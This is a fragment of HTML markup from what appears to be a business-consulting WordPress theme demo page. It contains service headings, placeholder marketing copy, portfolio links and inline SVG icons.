		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>	        
				<h5>Business Project Development </h5>							
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>	        
				<h5>Strategic Development Plans </h5>							
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>	        
				<h5>Search for Business Partners
</h5>							
		        <a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure></a>		    
	        what we offer	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them.</p>		
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						01						<h4>Client Learning Programs</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						02						<h4>Partnership Ecosystem</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						03						<h4>New Business Innovation</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
	        company poretfolio	        <h3>Our Latest Case Studies</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/strategy/">strategy</a></p> 
			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M267.3,479.04H65.56c-2.311,0-4.19-1.879-4.19-4.19v-52.436h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37v-49.032h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.039-11.422-25.461-25.461-25.461H61.37v-49.033h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37v-49.033h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37V19.19c0-2.311,1.879-4.19,4.19-4.19h52.74c4.142,0,7.5-3.358,7.5-7.5   S122.442,0,118.3,0H65.56C54.979,0,46.37,8.608,46.37,19.19v52.437h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.033h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.033h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.032h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v52.436c0,10.582,8.608,19.19,19.19,19.19H267.3c4.142,0,7.5-3.358,7.5-7.5   S271.442,479.04,267.3,479.04z M27.426,97.088c0-5.769,4.693-10.461,10.461-10.461h15.925c0.02,0,0.038,0.003,0.058,0.003   s0.038-0.003,0.058-0.003h15.928c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H37.887   C32.119,107.549,27.426,102.856,27.426,97.088z M27.426,197.043c0-5.769,4.693-10.461,10.461-10.461h31.969   c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H53.957c-0.029,0-0.058-0.004-0.087-0.004   s-0.058,0.004-0.087,0.004H37.887C32.119,207.504,27.426,202.812,27.426,197.043z M27.426,296.998   c0-5.768,4.693-10.461,10.461-10.461h15.925c0.02,0,0.038,0.003,0.058,0.003s0.038-0.003,0.058-0.003h15.928   c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H37.887C32.119,307.459,27.426,302.767,27.426,296.998z    M27.426,396.953c0-5.769,4.693-10.461,10.461-10.461h31.969c5.768,0,10.461,4.693,10.461,10.461   c0,5.768-4.693,10.461-10.461,10.461H53.948c-0.026,0-0.051-0.004-0.077-0.004s-0.051,0.004-0.077,0.004H37.887   C32.119,407.414,27.426,402.721,27.426,396.953z"></path>
	<path d="M148.295,15h202.564c20.029,0,36.325,16.295,36.325,36.325v133.679c0,4.142,3.358,7.5,7.5,7.5s7.5-3.358,7.5-7.5V51.325   C402.184,23.024,379.159,0,350.859,0H148.295c-4.142,0-7.5,3.358-7.5,7.5S144.153,15,148.295,15z"></path>
	<path d="M476.084,447.256v-4.661c0-8.921-5.646-16.549-13.551-19.499l-2.458-59.614c-0.171-4.139-3.655-7.359-7.803-7.185   c-4.139,0.171-7.355,3.664-7.185,7.803l2.701,65.501c0.166,4.019,3.472,7.191,7.494,7.191c3.199,0,5.802,2.603,5.802,5.802v4.627   H328.282v-4.627c0-3.199,2.603-5.802,5.803-5.802c4.022,0,7.328-3.172,7.494-7.191l5.259-127.533h95.691l1.292,31.323   c0.171,4.138,3.659,7.355,7.803,7.185c4.139-0.17,7.355-3.664,7.185-7.803l-1.266-30.705h16.948c3.875,0,7.113-2.953,7.468-6.812   l7.575-82.241c0.193-2.1-0.506-4.184-1.927-5.742c-1.421-1.558-3.432-2.446-5.541-2.446h-32.193c-4.142,0-7.5,3.358-7.5,7.5v18.054   h-13.973l-2.248-18.938c-0.448-3.774-3.647-6.616-7.448-6.616h-48.04c-3.8,0-7,2.842-7.448,6.616l-2.248,18.938h-13.972v-18.054   c0-4.142-3.358-7.5-7.5-7.5h-32.193c-2.109,0-4.12,0.888-5.541,2.446c-1.421,1.558-2.121,3.642-1.927,5.742l7.575,82.241   c0.355,3.859,3.593,6.812,7.468,6.812h16.948l-4.991,121.027c-7.906,2.95-13.552,10.578-13.552,19.499v4.661   c-13.066,0.672-23.489,11.512-23.489,24.742V504.5c0,4.142,3.358,7.5,7.5,7.5h194.781c4.142,0,7.5-3.358,7.5-7.5v-32.502   C499.574,458.768,489.15,447.927,476.084,447.256z M315.525,219.828h16.471v18.054c0,4.142,3.358,7.5,7.5,7.5h28.135   c3.8,0,7-2.842,7.448-6.616l2.248-18.938h34.714l2.248,18.938c0.448,3.774,3.647,6.616,7.448,6.616h28.135   c4.142,0,7.5-3.358,7.5-7.5v-18.054h16.47l-6.193,67.241h-17.922H339.641h-17.923L315.525,219.828z M484.574,497H304.793v-25.002   c0-5.39,4.385-9.775,9.775-9.775h6.214h147.802h6.214c5.39,0,9.775,4.385,9.775,9.775V497z"></path>
	<path d="M217.372,92.562c0-18.108-14.732-32.84-32.84-32.84c-18.108,0-32.84,14.732-32.84,32.84s14.732,32.84,32.84,32.84   C202.64,125.401,217.372,110.669,217.372,92.562z M166.691,92.562c0-9.837,8.003-17.84,17.84-17.84   c9.837,0,17.84,8.003,17.84,17.84s-8.003,17.84-17.84,17.84C174.694,110.401,166.691,102.398,166.691,92.562z"></path>
	<path d="M187.046,226.088c-4.03,0.958-6.52,5.002-5.562,9.032c1.208,5.078,2.677,10.156,4.368,15.095   c1.066,3.114,3.978,5.073,7.095,5.073c0.805,0,1.625-0.131,2.43-0.406c3.919-1.342,6.008-5.606,4.667-9.525   c-1.535-4.484-2.87-9.096-3.966-13.707C195.12,227.619,191.075,225.13,187.046,226.088z"></path>
	<path d="M184.532,181.222c-4.142,0-7.5,3.358-7.5,7.5v8.252c0,2.347,0.05,4.724,0.149,7.063c0.17,4.031,3.491,7.183,7.488,7.183   c0.107,0,0.215-0.002,0.323-0.007c4.138-0.175,7.351-3.672,7.176-7.811c-0.09-2.129-0.136-4.292-0.136-6.428v-8.252   C192.032,184.58,188.674,181.222,184.532,181.222z"></path>
	<path d="M285.918,335.648c-4.399-1.759-8.769-3.755-12.986-5.933c-3.682-1.9-8.206-0.456-10.105,3.224   c-1.9,3.681-0.457,8.205,3.224,10.105c4.643,2.396,9.453,4.594,14.297,6.531c0.913,0.365,1.855,0.538,2.782,0.538   c2.977,0,5.793-1.784,6.966-4.717C291.635,341.551,289.764,337.187,285.918,335.648z"></path>
	<path d="M219.523,283.323c-2.747-3.866-5.337-7.91-7.7-12.017c-2.066-3.59-6.649-4.826-10.241-2.761   c-3.59,2.066-4.826,6.651-2.761,10.241c2.601,4.52,5.451,8.968,8.473,13.223c1.463,2.059,3.774,3.157,6.121,3.157   c1.502,0,3.019-0.45,4.337-1.386C221.128,291.382,221.921,286.7,219.523,283.323z"></path>
	<path d="M239.667,326.047c1.376,1.085,3.013,1.611,4.639,1.611c2.218,0,4.414-0.98,5.894-2.856   c2.565-3.252,2.007-7.968-1.245-10.533c-3.723-2.936-7.35-6.087-10.778-9.365c-2.995-2.863-7.742-2.757-10.604,0.238   c-2.863,2.994-2.756,7.741,0.238,10.604C231.583,319.352,235.572,322.818,239.667,326.047z"></path>
	<path d="M224.3,192.801c2.769-3.081,2.515-7.823-0.565-10.592l-34.19-30.725c-0.041-0.037-0.085-0.068-0.127-0.104   c-0.087-0.075-0.177-0.148-0.268-0.219c-0.098-0.077-0.197-0.152-0.298-0.223c-0.091-0.064-0.184-0.126-0.278-0.187   c-0.107-0.068-0.214-0.134-0.324-0.197c-0.096-0.055-0.192-0.107-0.29-0.158c-0.113-0.058-0.226-0.112-0.341-0.164   c-0.101-0.046-0.202-0.09-0.304-0.131c-0.118-0.047-0.236-0.089-0.355-0.13c-0.104-0.036-0.208-0.071-0.315-0.102   c-0.126-0.037-0.253-0.068-0.381-0.098c-0.102-0.024-0.203-0.05-0.306-0.07c-0.15-0.029-0.3-0.049-0.451-0.069   c-0.084-0.011-0.167-0.026-0.251-0.034c-0.481-0.047-0.966-0.047-1.447,0c-0.083,0.008-0.163,0.022-0.245,0.033   c-0.153,0.02-0.306,0.041-0.458,0.07c-0.101,0.019-0.199,0.045-0.299,0.068c-0.13,0.031-0.26,0.062-0.389,0.1   c-0.104,0.03-0.205,0.065-0.307,0.1c-0.122,0.042-0.243,0.085-0.364,0.133c-0.1,0.04-0.199,0.083-0.297,0.127   c-0.118,0.053-0.234,0.109-0.349,0.168c-0.096,0.049-0.19,0.101-0.283,0.154c-0.112,0.064-0.221,0.131-0.33,0.201   c-0.092,0.059-0.183,0.12-0.273,0.183c-0.102,0.072-0.203,0.148-0.302,0.226c-0.09,0.071-0.179,0.143-0.266,0.217   c-0.042,0.036-0.086,0.067-0.128,0.104l-34.19,30.725c-3.081,2.769-3.334,7.511-0.565,10.592c1.481,1.648,3.527,2.487,5.581,2.487   c1.786,0,3.578-0.634,5.011-1.921l29.177-26.22l29.177,26.22C216.79,196.135,221.531,195.882,224.3,192.801z"></path>
	<path d="M213.736,370.946c-2.929-2.929-7.678-2.929-10.606,0l-18.598,18.598l-18.598-18.598c-2.929-2.929-7.678-2.929-10.606,0   c-2.929,2.929-2.929,7.678,0,10.606l18.598,18.598l-18.598,18.598c-2.929,2.929-2.929,7.678,0,10.606   c1.464,1.464,3.384,2.197,5.303,2.197s3.839-0.732,5.303-2.197l18.598-18.598l18.598,18.598c1.464,1.464,3.384,2.197,5.303,2.197   s3.839-0.732,5.303-2.197c2.929-2.929,2.929-7.678,0-10.606l-18.598-18.598l18.598-18.598   C216.665,378.624,216.665,373.875,213.736,370.946z"></path>
</g>
</svg>        	
        	<p>Businesses Guided <br>Over Thirty Years</p>      				        
			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M260.981,445.576H65.171c-12.354,0-22.405-10.051-22.405-22.405V91.202c0-4.143-3.357-7.5-7.5-7.5s-7.5,3.357-7.5,7.5   v331.969c0,20.625,16.78,37.405,37.405,37.405h195.81c4.143,0,7.5-3.357,7.5-7.5S265.124,445.576,260.981,445.576z"></path>
	<path d="M35.266,68.701c4.143,0,7.5-3.357,7.5-7.5V37.405C42.766,25.051,52.817,15,65.171,15h283.655   c12.354,0,22.405,10.051,22.405,22.405v121.67c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5V37.405   C386.232,16.78,369.452,0,348.827,0H65.171C44.546,0,27.766,16.78,27.766,37.405v23.796C27.766,65.344,31.124,68.701,35.266,68.701   z"></path>
	<path d="M301.033,102.805c12.924,0,23.438-10.515,23.438-23.438s-10.514-23.438-23.438-23.438s-23.438,10.514-23.438,23.438   c0,5.101,1.643,9.823,4.421,13.675l-36.844,51.487c-2.162-0.66-4.454-1.017-6.828-1.017c-5.982,0-11.444,2.255-15.59,5.957   l-24.089-13.669c0.278-1.44,0.428-2.925,0.428-4.444c0-12.924-10.514-23.438-23.438-23.438s-23.438,10.514-23.438,23.438   c0,1.52,0.15,3.004,0.428,4.444l-24.089,13.669c-4.146-3.701-9.609-5.956-15.59-5.956c-12.924,0-23.438,10.514-23.438,23.438   s10.514,23.438,23.438,23.438s23.438-10.514,23.438-23.438c0-1.52-0.15-3.004-0.428-4.444l24.089-13.669   c4.146,3.701,9.609,5.956,15.59,5.956c5.981,0,11.444-2.255,15.59-5.956l24.089,13.669c-0.278,1.44-0.428,2.924-0.428,4.444   c0,12.924,10.514,23.438,23.438,23.438s23.438-10.514,23.438-23.438c0-5.102-1.644-9.824-4.422-13.677l36.843-51.485   C296.365,102.447,298.657,102.805,301.033,102.805z M112.965,175.386c-4.652,0-8.438-3.785-8.438-8.438s3.785-8.438,8.438-8.438   c4.653,0,8.438,3.785,8.438,8.438S117.619,175.386,112.965,175.386z M175.655,139.791c-4.653,0-8.438-3.785-8.438-8.438   s3.785-8.438,8.438-8.438c4.652,0,8.438,3.785,8.438,8.438S180.307,139.791,175.655,139.791z M238.343,175.386   c-4.652,0-8.438-3.785-8.438-8.438s3.785-8.438,8.438-8.438c4.653,0,8.438,3.785,8.438,8.438S242.997,175.386,238.343,175.386z    M301.033,70.929c4.652,0,8.438,3.785,8.438,8.438c0,4.653-3.785,8.438-8.438,8.438c-4.653,0-8.438-3.785-8.438-8.438   C292.594,74.714,296.379,70.929,301.033,70.929z"></path>
	<path d="M275.355,285.43H89.279c-4.143,0-7.5,3.357-7.5,7.5s3.357,7.5,7.5,7.5h186.076c4.143,0,7.5-3.357,7.5-7.5   S279.498,285.43,275.355,285.43z"></path>
	<path d="M81.779,378.157c0,4.143,3.357,7.5,7.5,7.5h202.743c4.143,0,7.5-3.357,7.5-7.5s-3.357-7.5-7.5-7.5H89.279   C85.136,370.657,81.779,374.015,81.779,378.157z"></path>
	<path d="M430.511,325.202c14.881-10.362,26.219-24.74,32.788-41.58c0.119-0.305,0.214-0.616,0.292-0.929   c3.833-10.075,5.909-20.904,5.909-32.037v-15.287h7.234c4.143,0,7.5-3.357,7.5-7.5v-38.796c0-4.143-3.357-7.5-7.5-7.5H280.729   c-4.143,0-7.5,3.357-7.5,7.5v38.796c0,4.143,3.357,7.5,7.5,7.5h7.234v15.287c0,11.133,2.076,21.962,5.909,32.037   c0.077,0.313,0.172,0.624,0.292,0.929c6.569,16.84,17.907,31.218,32.788,41.58c4.754,3.311,9.768,6.134,14.981,8.452v26.281   c-32.488,14.441-53.97,47.146-53.97,82.98v15.288h-7.234c-4.143,0-7.5,3.357-7.5,7.5V504.5c0,4.143,3.357,7.5,7.5,7.5h196.005   c4.143,0,7.5-3.357,7.5-7.5v-38.796c0-4.143-3.357-7.5-7.5-7.5H469.5v-15.288c0-15.772-4.111-31.31-11.891-44.933   c-2.054-3.597-6.635-4.847-10.231-2.794c-3.598,2.054-4.849,6.635-2.794,10.231c6.487,11.361,9.916,24.327,9.916,37.495v15.287   h-17.747l-31.201-37.851c-6.508-7.896-16.109-12.451-26.342-12.499c-0.055,0-0.106,0-0.161,0c-10.172,0-19.749,4.461-26.295,12.254   l-32.001,38.096h-17.789v-15.287c0-31.381,19.735-59.886,49.109-70.932c2.924-1.1,4.86-3.896,4.86-7.021v-26.187   c4.675,1.152,9.451,1.938,14.299,2.333v18.77c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-18.77   c4.847-0.396,9.623-1.182,14.298-2.333v26.187c0,3.124,1.937,5.92,4.86,7.02c7.89,2.968,15.194,7.215,21.71,12.623   c3.187,2.646,7.916,2.207,10.561-0.98c2.646-3.187,2.207-7.915-0.98-10.561c-6.448-5.354-13.544-9.757-21.15-13.132v-26.279   C420.744,331.336,425.757,328.513,430.511,325.202z M364.24,429.755c3.688-4.39,9.08-6.901,14.81-6.901c0.03,0,0.061,0,0.091,0   c5.763,0.026,11.171,2.593,14.837,7.04l23.336,28.31h-76.971L364.24,429.755z M469.234,473.204V497H288.229v-23.796H469.234z    M288.229,220.369v-23.796h181.005v23.796H462H295.463H288.229z M405.39,321.588c-0.194,0.073-0.372,0.172-0.557,0.26   c-8.184,2.976-16.983,4.577-26.101,4.577c-9.119,0-17.92-1.602-26.105-4.578c-0.184-0.087-0.361-0.186-0.554-0.259   c-16.736-6.293-30.335-18.26-38.946-33.191h21.454c4.143,0,7.5-3.357,7.5-7.5s-3.357-7.5-7.5-7.5h-28.083   c-2.303-7.25-3.534-14.905-3.534-22.74v-15.287H454.5v15.287c0,7.835-1.231,15.491-3.534,22.74H364.58c-4.143,0-7.5,3.357-7.5,7.5   s3.357,7.5,7.5,7.5h79.757C435.726,303.328,422.126,315.294,405.39,321.588z"></path>
	<path d="M378.732,378.377c-4.143,0-7.5,3.357-7.5,7.5v3.478c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-3.478   C386.232,381.734,382.875,378.377,378.732,378.377z"></path>
</g>
</svg>        	
        	<p>Finished & Supported <br>Incredible Projects</p>      				        
			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M337.392,377.361c-3.438,2.311-4.352,6.971-2.041,10.408c1.447,2.154,3.817,3.317,6.231,3.317   c1.438,0,2.894-0.414,4.177-1.276c16.269-10.935,30.137-24.531,41.213-39.984c0.12-0.155,0.237-0.313,0.345-0.477   c19.123-26.889,29.79-59.369,29.79-93.349c0-34.475-10.889-66.451-29.401-92.682c-0.337-0.65-0.765-1.244-1.269-1.765   c-29.308-40.366-76.859-66.669-130.446-66.669c-23.574,0-46.297,4.979-67.537,14.798c-3.76,1.738-5.398,6.195-3.66,9.955   c1.737,3.759,6.194,5.399,9.955,3.66c9.401-4.346,19.125-7.638,29.104-9.877c-6.338,7.999-12.09,18.475-17.049,31.242   c-1.8,4.635-3.459,9.528-5.004,14.602h-55.278c6.863-7.762,14.532-14.819,22.869-20.963c3.334-2.458,4.045-7.153,1.588-10.487   c-2.458-3.334-7.153-4.044-10.487-1.588c-13.521,9.966-25.468,22.09-35.293,35.709c-0.237,0.281-0.449,0.582-0.643,0.896   c-4.379,6.158-8.331,12.614-11.792,19.313c-11.704,22.652-17.89,48.192-17.89,73.858c0,34.476,10.89,66.453,29.403,92.684   c0.336,0.648,0.763,1.24,1.266,1.76c29.308,40.368,76.86,66.672,130.448,66.672c21.485,0,42.351-4.162,62.017-12.371   c3.823-1.596,5.628-5.988,4.032-9.811c-1.595-3.822-5.99-5.626-9.81-4.032c-7.837,3.271-15.886,5.832-24.102,7.677   c6.338-7.999,12.089-18.475,17.048-31.24c1.801-4.635,3.46-9.528,5.005-14.602h55.316   C357.316,361.992,347.91,370.292,337.392,377.361z M365.396,159.263h-30.918c-4.143,0-7.5,3.358-7.5,7.5s3.357,7.5,7.5,7.5h42.572   c14.497,21.403,23.475,46.836,24.867,74.237h-78.825c-0.715-39.135-7.01-75.766-17.916-103.839   c-4.951-12.745-10.692-23.208-17.018-31.202C318.567,120.318,345.411,136.686,365.396,159.263z M203.888,263.5h104.203   c-0.528,28.173-4.011,53.335-9.326,74.237h-85.586C207.61,315.734,204.393,290.293,203.888,263.5z M203.89,248.5   c0.528-28.173,4.011-53.335,9.326-74.237h85.586c5.569,22.003,8.786,47.444,9.291,74.237H203.89z M255.991,109.883   c12.446,0,25.277,14.656,35.204,40.209c1.145,2.948,2.224,6.023,3.26,9.17h-76.878   C227.822,128.263,242.336,109.883,255.991,109.883z M126.09,189.027c2.628-5.086,5.568-10.016,8.784-14.765h62.867   c-5.312,22.341-8.368,47.708-8.852,74.237h-78.817C111.109,227.612,116.475,207.637,126.09,189.027z M146.584,352.737h30.074   c4.142,0,7.5-3.358,7.5-7.5s-3.358-7.5-7.5-7.5h-41.727c-14.498-21.403-23.475-46.836-24.867-74.237h78.825   c0.715,39.135,7.01,75.766,17.915,103.839c4.951,12.745,10.692,23.208,17.018,31.202   C193.413,391.682,166.57,375.314,146.584,352.737z M255.991,402.117c-12.446,0-25.278-14.656-35.204-40.209   c-1.145-2.948-2.224-6.023-3.26-9.17h76.878C284.159,383.737,269.645,402.117,255.991,402.117z M314.24,337.737   c5.312-22.341,8.368-47.709,8.852-74.237h78.807c-1.373,26.87-10.084,52.455-24.791,74.237H314.24z"></path>
	<path d="M414.428,113.042L300.576,47.313c-3.589-2.072-8.175-0.842-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l113.852,65.729c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.346,6.502-3.751   C419.244,119.7,418.015,115.113,414.428,113.042z"></path>
	<path d="M67.967,321.706V190.294c0-4.142-3.358-7.5-7.5-7.5s-7.5,3.358-7.5,7.5v131.412c0,4.142,3.358,7.5,7.5,7.5   S67.967,325.848,67.967,321.706z"></path>
	<path d="M406.905,385.979l-113.828,65.718c-3.587,2.071-4.816,6.658-2.745,10.245c1.389,2.406,3.91,3.751,6.502,3.751   c1.272,0,2.563-0.324,3.743-1.006l113.828-65.718c3.587-2.071,4.816-6.658,2.745-10.245   C415.079,385.137,410.491,383.907,406.905,385.979z"></path>
	<path d="M444.014,190.294v131.412c0,4.142,3.357,7.5,7.5,7.5s7.5-3.358,7.5-7.5V190.294c0-4.142-3.357-7.5-7.5-7.5   S444.014,186.152,444.014,190.294z"></path>
	<path d="M218.904,451.697l-113.851-65.729c-3.587-2.072-8.174-0.842-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l113.851,65.729c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.346,6.502-3.751   C223.72,458.354,222.491,453.768,218.904,451.697z"></path>
	<path d="M101.333,127.027c1.272,0,2.562-0.324,3.743-1.006l113.828-65.718c3.587-2.071,4.816-6.658,2.745-10.245   c-2.072-3.587-6.658-4.816-10.245-2.745L97.576,113.031c-3.587,2.071-4.816,6.658-2.745,10.245   C96.22,125.682,98.741,127.027,101.333,127.027z"></path>
	<path d="M255.991,60.46c16.669,0,30.23-13.561,30.23-30.23S272.659,0,255.991,0s-30.23,13.562-30.23,30.23   S239.322,60.46,255.991,60.46z M255.991,15c8.398,0,15.23,6.833,15.23,15.23s-6.832,15.23-15.23,15.23   c-8.398,0-15.23-6.832-15.23-15.23S247.593,15,255.991,15z"></path>
	<path d="M75.583,116.935C61.149,108.6,42.623,113.564,34.288,128c-8.334,14.436-3.371,32.961,11.065,41.295   c4.749,2.742,9.938,4.044,15.064,4.044c10.455,0,20.638-5.422,26.231-15.109C94.983,143.794,90.019,125.27,75.583,116.935z    M73.658,150.73c-4.2,7.272-13.532,9.773-20.805,5.575c-7.272-4.199-9.773-13.532-5.575-20.805   c2.034-3.523,5.318-6.043,9.248-7.096s8.034-0.513,11.557,1.521C75.356,134.125,77.857,143.458,73.658,150.73z"></path>
	<path d="M45.353,342.705C30.917,351.039,25.953,369.564,34.288,384c5.593,9.688,15.775,15.109,26.231,15.109   c5.125,0,10.316-1.303,15.064-4.044c14.436-8.334,19.399-26.859,11.065-41.295C78.313,339.333,59.787,334.371,45.353,342.705z    M68.083,382.075c-3.523,2.034-7.629,2.574-11.557,1.521c-3.93-1.053-7.214-3.573-9.248-7.096   c-4.199-7.273-1.698-16.606,5.575-20.805c7.273-4.2,16.605-1.698,20.805,5.575C77.857,368.542,75.356,377.875,68.083,382.075z"></path>
	<path d="M255.991,451.54c-16.669,0-30.23,13.561-30.23,30.23S239.322,512,255.991,512s30.23-13.562,30.23-30.23   S272.659,451.54,255.991,451.54z M255.991,497c-8.398,0-15.23-6.833-15.23-15.23s6.833-15.23,15.23-15.23   c8.398,0,15.23,6.832,15.23,15.23S264.389,497,255.991,497z"></path>
	<path d="M466.628,342.705c-14.435-8.333-32.96-3.371-41.296,11.065c-8.334,14.436-3.37,32.961,11.065,41.295   c4.658,2.689,9.827,4.063,15.066,4.063c2.625,0,5.27-0.345,7.873-1.043c7.8-2.09,14.318-7.092,18.355-14.084   c4.038-6.993,5.11-15.14,3.021-22.94C478.623,353.261,473.621,346.742,466.628,342.705z M464.702,376.5L464.702,376.5   c-2.034,3.523-5.318,6.044-9.248,7.097c-3.929,1.053-8.034,0.513-11.557-1.521c-7.272-4.199-9.773-13.532-5.575-20.805   c2.818-4.881,7.948-7.612,13.216-7.612c2.582,0,5.197,0.656,7.59,2.037c3.522,2.034,6.043,5.318,7.096,9.248   S466.737,372.977,464.702,376.5z"></path>
